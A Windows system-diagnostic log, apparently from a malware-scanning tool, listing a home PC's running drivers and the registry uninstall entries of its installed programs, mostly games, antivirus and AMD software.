---------- | Services | 0 : Starting up | 1 : System | 2 : Automatic | 3 : Manual | 4 : Disabled | R : Running service | S : Stopped service

R0 - [Kernel Driver] - ACPI (Pilote ACPI Microsoft) -> system32\drivers\ACPI.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - amdxata () -> system32\drivers\amdxata.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - CLFS (@%SystemRoot%\system32\clfs.sys,-100) -> System32\CLFS.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - CNG () -> System32\Drivers\cng.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - Disk (Pilote de disque) -> system32\DRIVERS\disk.sys - AcceptPause: False - AcceptStop: True
R0 - [File System Driver] - FileInfo (@%SystemRoot%\system32\drivers\fileinfo.sys,-100) -> system32\drivers\fileinfo.sys - AcceptPause: False - AcceptStop: True
R0 - [File System Driver] - FltMgr (@%SystemRoot%\system32\drivers\fltmgr.sys,-10001) -> system32\drivers\fltmgr.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - fvevol (@%SystemRoot%\system32\drivers\fvevol.sys,-100) -> System32\DRIVERS\fvevol.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - hwpolicy (@%systemroot%\system32\drivers\hwpolicy.sys,-101) -> System32\drivers\hwpolicy.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - iaStorV (Contrôleur RAID Intel Windows 7) -> system32\drivers\iaStorV.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - KSecDD () -> System32\Drivers\ksecdd.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - KSecPkg () -> System32\Drivers\ksecpkg.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - mountmgr (@%SystemRoot%\system32\drivers\mountmgr.sys,-100) -> System32\drivers\mountmgr.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - msisadrv () -> system32\drivers\msisadrv.sys - AcceptPause: False - AcceptStop: True
R0 - [File System Driver] - Mup (@%systemroot%\system32\drivers\mup.sys,-101) -> System32\Drivers\mup.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - NDIS (@%SystemRoot%\system32\drivers\ndis.sys,-200) -> system32\drivers\ndis.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - partmgr (@%SystemRoot%\system32\drivers\partmgr.sys,-100) -> System32\drivers\partmgr.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - pci (Pilote de bus PCI) -> system32\drivers\pci.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - pcw (Performance Counters for Windows Driver) -> System32\drivers\pcw.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - rdyboost (ReadyBoost) -> System32\drivers\rdyboost.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - spldr (Security Processor Loader Driver) -> (?) - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - storflt (@%SystemRoot%\system32\vmstorfltres.dll,-1000) -> system32\drivers\vmstorfl.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - Tcpip (@%SystemRoot%\system32\tcpipcfg.dll,-50003) -> System32\drivers\tcpip.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - vdrvroot (Pilote d’énumérateur de lecteur virtuel Microsoft) -> system32\drivers\vdrvroot.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - vmbus (@%SystemRoot%\system32\vmbusres.dll,-1000) -> system32\drivers\vmbus.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - volmgr (Pilote du Gestionnaire de volume) -> system32\drivers\volmgr.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - volmgrx (@%SystemRoot%\system32\drivers\volmgrx.sys,-100) -> System32\drivers\volmgrx.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - volsnap (Volumes de stockage) -> system32\drivers\volsnap.sys - AcceptPause: False - AcceptStop: True
R0 - [Kernel Driver] - Wdf01000 (@%SystemRoot%\system32\drivers\Wdf01000.sys,-1000) -> system32\drivers\Wdf01000.sys - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - AFD (@%systemroot%\system32\drivers\afd.sys,-1000) -> \SystemRoot\system32\drivers\afd.sys - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - aswRdr (aswRdr) -> \SystemRoot\System32\Drivers\aswrdr2.sys - AcceptPause: False - AcceptStop: True
R1 - [File System Driver] - aswSnx (aswSnx) -> (?) - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - aswSP (aswSP) -> (?) - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - aswTdi (avast! Network Shield Support) -> (?) - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - Beep (Beep) -> (?) - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - blbdrive () -> system32\DRIVERS\blbdrive.sys - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - cdrom (Pilote de CD-ROM) -> \SystemRoot\system32\drivers\cdrom.sys - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - CSC (@%systemroot%\system32\cscsvc.dll,-202) -> system32\drivers\csc.sys - AcceptPause: False - AcceptStop: True
R1 - [File System Driver] - DfsC (@%systemroot%\system32\drivers\dfsc.sys,-101) -> System32\Drivers\dfsc.sys - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - discache (@%systemroot%\system32\drivers\discache.sys,-102) -> System32\drivers\discache.sys - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - dtsoftbus01 (DAEMON Tools Virtual Bus Driver) -> system32\DRIVERS\dtsoftbus01.sys - AcceptPause: False - AcceptStop: True
R1 - [File System Driver] - Msfs () -> (?) - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - mssmbios (Pilote BIOS de gestion de systèmes Microsoft) -> \SystemRoot\system32\drivers\mssmbios.sys - AcceptPause: False - AcceptStop: True
R1 - [File System Driver] - NetBIOS (NetBIOS Interface) -> system32\DRIVERS\netbios.sys - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - NetBT (@%SystemRoot%\system32\drivers\netbt.sys,-2) -> System32\DRIVERS\netbt.sys - AcceptPause: False - AcceptStop: True
R1 - [File System Driver] - Npfs () -> (?) - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - nsiproxy (@%SystemRoot%\system32\drivers\nsiproxy.sys,-2) -> system32\drivers\nsiproxy.sys - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - Null () -> (?) - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - Psched (@%SystemRoot%\System32\drivers\pacer.sys,-101) -> system32\DRIVERS\pacer.sys - AcceptPause: False - AcceptStop: True
R1 - [File System Driver] - rdbss (@%systemroot%\system32\wkssvc.dll,-1000) -> system32\DRIVERS\rdbss.sys - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - RDPCDD (@%systemroot%\system32\DRIVERS\RDPCDD.sys,-100) -> System32\DRIVERS\RDPCDD.sys - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - RDPENCDD (@%systemroot%\system32\drivers\RDPENCDD.sys,-101) -> system32\drivers\rdpencdd.sys - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - RDPREFMP (@%systemroot%\system32\drivers\RdpRefMp.sys,-101) -> system32\drivers\rdprefmp.sys - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - Serial (Pilote de port série) -> system32\DRIVERS\serial.sys - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - tdx (@%SystemRoot%\system32\tcpipcfg.dll,-50004) -> system32\DRIVERS\tdx.sys - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - TermDD (Pilote de périphérique terminal) -> \SystemRoot\system32\drivers\termdd.sys - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - VgaSave () -> \SystemRoot\System32\drivers\vga.sys - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - Wanarpv6 (@%systemroot%\system32\rascfg.dll,-32012) -> system32\DRIVERS\wanarp.sys - AcceptPause: False - AcceptStop: True
R1 - [Kernel Driver] - WfpLwf (WFP Lightweight Filter) -> system32\DRIVERS\wfplwf.sys - AcceptPause: False - AcceptStop: True
R2 - [File System Driver] - aswFsBlk (aswFsBlk) -> (?) - AcceptPause: False - AcceptStop: True
S2 - [File System Driver] - aswMonFlt (aswMonFlt) -> \??\C:\Windows\system32\drivers\aswMonFlt.sys - AcceptPause: False - AcceptStop: False
R2 - [Kernel Driver] - lltdio (Link-Layer Topology Discovery Mapper I/O Driver) -> system32\DRIVERS\lltdio.sys - AcceptPause: False - AcceptStop: True
R2 - [File System Driver] - luafv (@%systemroot%\system32\drivers\luafv.sys,-100) -> \SystemRoot\system32\drivers\luafv.sys - AcceptPause: False - AcceptStop: True
R2 - [Kernel Driver] - PEAUTH (PEAUTH) -> system32\drivers\peauth.sys - AcceptPause: False - AcceptStop: True
R2 - [Kernel Driver] - rspndr (Link-Layer Topology Discovery Responder) -> system32\DRIVERS\rspndr.sys - AcceptPause: False - AcceptStop: True
R2 - [Kernel Driver] - tcpipreg (TCP/IP Registry Compatibility) -> System32\drivers\tcpipreg.sys - AcceptPause: False - AcceptStop: True

---------- | System files (Microsoft|Avast|Atheros|Adaptec|Brother|Intel Files whitelisted)


---------- | Uninstall

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\1D98FB2F-73F1-419A-A159-521B0F645CFB-2] : (Dofus Beta.-.Ankama) -> C:\Users\PC\AppData\Local\Ankama\Dofus Beta\Dofus Beta.exe --uninstall-or-repair
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\GameRanger] : (GameRanger.-.GameRanger Technologies) -> C:\Users\PC\AppData\Roaming\GameRanger\GameRanger\GameRanger.exe /uninstall
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\Google Chrome] : (.-.) -> 
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\PhotoFiltre 7] : (PhotoFiltre 7.-.) -> "C:\Program Files (x86)\PhotoFiltre 7\Uninst.exe"
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\uTorrent] : (µTorrent.-.BitTorrent Inc.) -> "C:\Users\PC\AppData\Roaming\uTorrent\uTorrent.exe" /UNINSTALL
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\6af12c54-643b-4752-87d0-8335503010de_is1] : (Nexus Mod Manager.-.Black Tree Gaming) -> "C:\Program Files\Nexus Mod Manager\uninstall\unins000.exe"
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\7-Zip] : (7-Zip 15.12 (x64).-.Igor Pavlov) -> C:\Program Files\7-Zip\Uninstall.exe
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\AddressBook] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\AMD Catalyst Install Manager] : (AMD Install Manager.-.Advanced Micro Devices, Inc.) -> "C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe" /UNINSTALL /IGNORE_UPGRADE /ON_REBOOT_MESSAGE:NO
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\CCleaner] : (CCleaner.-.Piriform) -> "C:\Program Files\CCleaner\uninst.exe"
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\Connection Manager] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\DirectDrawEx] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\DXM_Runtime] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\Fontcore] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\IE40] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\IE4Data] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\IE5BAKEX] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\IEData] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\MobileOptionPack] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\MPlayer2] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\SchedulingAgent] : (.-.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\Steam App 33910] : (Arma 2.-.Bohemia Interactive) -> "C:\Program Files (x86)\Steam\steam.exe" steam://uninstall/33910
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\Steam App 33930] : (Arma 2: Operation Arrowhead.-.Bohemia Interactive) -> "C:\Program Files (x86)\Steam\steam.exe" steam://uninstall/33930
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\Steam App 39650] : (The Guild II.-.4 Head Studios) -> "C:\Program Files (x86)\Steam\steam.exe" steam://uninstall/39650
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\Steam App 39680] : (The Guild II: Renaissance.-.Rune Forge) -> "C:\Program Files (x86)\Steam\steam.exe" steam://uninstall/39680
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\Steam App 48700] : (Mount & Blade: Warband.-.TaleWorlds Entertainment) -> "C:\Program Files (x86)\Steam\steam.exe" steam://uninstall/48700
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\Steam App 48720] : (Mount & Blade: With Fire and Sword.-.TaleWorlds Entertainment) -> "C:\Program Files (x86)\Steam\steam.exe" steam://uninstall/48720
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\TeamSpeak 3 Client] : (TeamSpeak 3 Client.-.TeamSpeak Systems GmbH) -> "C:\Program Files\TeamSpeak 3 Client\uninstall.exe"
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\WIC] : (.-.) -> 
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{04F0FFCB-D9A5-2332-2697-CA47C0424AF2}] : (Catalyst Control Center Next Localization IT.-.Advanced Micro Devices, Inc.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{1655E9E4-04C9-414E-8581-6D1162DFB802}] : (TortoiseSVN 1.9.5.27581 (64 bit).-.TortoiseSVN) -> MsiExec.exe /I{1655E9E4-04C9-414E-8581-6D1162DFB802}
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{1C44BB26-1941-DB44-D5E8-C455F89EE6E6}] : (Catalyst Control Center Next Localization TH.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{1FCA484A-5A9E-9C91-F050-257D1F311A0C}] : (Catalyst Control Center Next Localization NL.-.Advanced Micro Devices, Inc.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{2370FF7F-E5E8-4BD5-AF41-70AD7A87F0C0}] : (Grec - Français version 2009.01.02.-.Denis Liégeois (mailto:denis.liegeois@neottia.net)) -> MsiExec.exe /I{2370FF7F-E5E8-4BD5-AF41-70AD7A87F0C0}
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{2CEBB6AA-EC39-DFF2-1F5B-9A98301C4DAB}] : (Catalyst Control Center Next Localization CS.-.Advanced Micro Devices, Inc.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1] : (Malwarebytes version 3.1.2.1733.-.Malwarebytes) -> "C:\Program Files\Malwarebytes\Anti-Malware\unins000.exe"
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{35F79A5D-00E2-8C19-D929-2E85DEA4252D}] : (Catalyst Control Center Next Localization CHT.-.Advanced Micro Devices, Inc.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{38AFD787-4D2E-4442-92D2-7739F5F92CF4}_is1] : (SoftPerfect WiFi Guard version 1.0.5.-.SoftPerfect Research) -> "C:\Program Files\SoftPerfect WiFi Guard\unins000.exe"
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{3BAB5AC8-EF35-FED0-BCEB-9306D05EDE1C}] : (Catalyst Control Center Next Localization RU.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{426582A8-202F-D13C-8BD5-F00551BAFC93}] : (AMD Wireless Display v3.0.-.Advanced Micro Devices, Inc.) -> MsiExec.exe /X{426582A8-202F-D13C-8BD5-F00551BAFC93}
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{43781dff-e0df-49ce-a6d2-47da96a485e7}}_is1] : (Free Download Manager.-.FreeDownloadManager.ORG) -> "C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\unins000.exe"
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{450F8249-9100-5CF2-1E65-72560F31CF2C}] : (AMD Wireless Display v3.0.-.Advanced Micro Devices, Inc.) -> MsiExec.exe /X{450F8249-9100-5CF2-1E65-72560F31CF2C}
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{47F2FFDC-3D6A-CED6-0B54-6E7082D5B29B}] : (Catalyst Control Center Next Localization JA.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{487C3865-3005-F04A-FBA4-F4239E02A847}] : (Catalyst Control Center Next Localization FI.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{5608D1B6-6483-9FA3-7297-C2CFC3FCE747}] : (Catalyst Control Center Next Localization KO.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{585A6A74-1DED-8DA0-32F1-F5EFA485DFB1}] : (Catalyst Control Center Next Localization BR.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{746E086C-023A-A79C-DBE1-062E773FF6C8}] : (Catalyst Control Center Next Localization SV.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{78ACE60E-0CB7-4935-BCD4-F33422105607}] : (AMD Settings - Branding.-.Advanced Micro Devices, Inc.) -> MsiExec.exe /I{78ACE60E-0CB7-4935-BCD4-F33422105607}
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{8F2415FA-72F2-F029-0450-4EB2FAE484C5}] : (AMD Accelerated Video Transcoding.-.Advanced Micro Devices, Inc.) -> MsiExec.exe /X{8F2415FA-72F2-F029-0450-4EB2FAE484C5}
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{98527BF3-A8E0-B8CF-7297-436B714FC576}] : (Catalyst Control Center Next Localization EL.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{A0649E20-C57C-DCFA-AE1B-1CE1CB9D98A8}] : (Catalyst Control Center Next Localization CHS.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{A239C6BD-191D-63FF-32C1-7832EC2BBBFF}] : (AMD Settings.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_installer] : (NVIDIA Install Application.-.NVIDIA Corporation) -> 
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{BE7F26CB-6E91-7673-7130-80C36FBF13DE}] : (Catalyst Control Center Next Localization TR.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{CBABB5FD-BD69-8969-729A-5659E11D9518}] : (Catalyst Control Center Next Localization DE.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{D21BFF5C-51AA-4C15-1C91-6A1087FDC373}] : (Catalyst Control Center Next Localization HU.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{D6CD1B25-53E6-C2F8-FA99-F89138A9C86F}] : (Catalyst Control Center Next Localization ES.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{D80AD200-548C-B62B-32AE-BF3CD7AA7EA2}] : (Catalyst Control Center Next Localization FR.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{D8FB03AE-A326-0C12-AC47-B898FE73FA94}] : (Catalyst Control Center Next Localization NO.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{F05F0B6E-9999-55D0-C323-D06DF0E2B59F}] : (Catalyst Control Center Next Localization DA.-.Advanced Micro Devices, Inc.) -> 
[HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{F0709044-9885-4F2A-96EF-6D1CB9E0BE52}] : (Flotte Royal Air Maroc.-.BENDER Erik) -> C:\PROGRA~3\INSTAL~1\{F0709~1\Setup.exe /remove /q0
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{F389A14F-B924-E628-4E4F-8D93AFB0215F}] : (AMD Install Manager.-.Advanced Micro Devices, Inc.) -> msiexec /q/x{F389A14F-B924-E628-4E4F-8D93AFB0215F} REBOOT=ReallySuppress
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{F6BF49D7-479E-23FE-A8A9-63D193D05697}] : (AMD Drag and Drop Transcoding.-.Advanced Micro Devices, Inc.) -> MsiExec.exe /X{F6BF49D7-479E-23FE-A8A9-63D193D05697}
##########[{Hidden}][HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\{F7876D2E-CDCD-CE53-0E88-995B57A94B58}] : (Catalyst Control Center Next Localization PL.-.Advanced Micro Devices, Inc.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\1443083988_is1] : (Way of the Samurai 4.-.GOG.com) -> "C:\GOG Games\Way of the Samurai 4\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\3D Ripper DX_is1] : (3D Ripper DX v1.8.2.-.Roman Lut) -> "C:\Program Files (x86)\3DRipperDX\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\AddressBook] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX] : (Adobe Flash Player 15 ActiveX.-.Adobe Systems Incorporated) -> C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_15_0_0_189_ActiveX.exe -maintain activex
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Adobe Flash Player NPAPI] : (Adobe Flash Player 26 NPAPI.-.Adobe Systems Incorporated) -> C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_26_0_0_137_Plugin.exe -maintain plugin
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Anno Domini 1257] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\avast] : (avast! Free Antivirus.-.AVAST Software) -> C:\Program Files\AVAST Software\Avast\aswRunDll.exe "C:\Program Files\AVAST Software\Avast\Setup\setiface.dll" RunSetup
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Bandicam] : (Bandicam.-.Bandisoft.com) -> "C:\Program Files (x86)\Bandicam\uninstall.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\BandiMPEG1] : (Bandisoft MPEG-1 Decoder.-.Bandisoft.com) -> "C:\Program Files (x86)\BandiMPEG1\uninstall.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\BattlEye for Iron Front] : (BattlEye for Iron Front Uninstall.-.) -> C:\Program files\AWAR\Iron Front - Liberation 1944\BattlEye\UnInstallBE.exe
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\BattlEye for OA] : (BattlEye for OA Uninstall.-.) -> C:\Program Files (x86)\Steam\steamapps\common\Arma 2 Operation Arrowhead\Expansion\BattlEye\UnInstallBE.exe
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Cheat Engine 6.6_is1] : (Cheat Engine 6.6.-.Cheat Engine) -> "C:\Program Files (x86)\Cheat Engine 6.6\unins000.exe"
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Connection Manager] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Crusader Kings II Monks and Mystics_is1] : (Crusader Kings II Monks and Mystics.-.) -> "D:\Crusader Kings II Monks and Mystics\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\DAEMON Tools Lite] : (DAEMON Tools Lite.-.Disc Soft Ltd) -> C:\Program Files (x86)\DAEMON Tools Lite\uninst.exe
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\DirectDrawEx] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Emergency 2013] : (Emergency 2013.-.Quadriga Games) -> "D:\Emergency 2013 jeu\Emergency 2013\uninstall.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Euro Truck Simulator 2_is1] : (Euro Truck Simulator 2.-.) -> "D:\Games\Euro Truck Simulator 2\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Europa Universalis IV Third Rome_is1] : (Europa Universalis IV Third Rome.-.) -> "D:\Europa Universalis IV Third Rome\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Expeditions Viking_is1] : (Expeditions Viking.-.) -> "D:\Viking\Expeditions Viking\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Fontcore] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\ForceBindIP] : (ForceBindIP.-.) -> C:\Program Files (x86)\ForceBindIP\uninstall.exe
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Free Video Flip and Rotate_is1] : (Free Video Flip and Rotate.-.Digital Wave Ltd) -> C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\Uninstall.exe /app FreeVideoFlipAndRotate
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\FreeArc] : (FreeArc 0.666.-.Bulat Ziganshin) -> C:\Program Files (x86)\FreeArc\uninst.exe
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Gekokujo] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Hearts of Iron IV Death or Dishonor_is1] : (Hearts of Iron IV Death or Dishonor.-.) -> "D:\Hearts of Iron IV Death or Dishonor\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Hundred Years War Mod] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\IE40] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\IE4Data] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\IE5BAKEX] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\IEData] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\InstallShield Uninstall Information] : (.-.) -> 
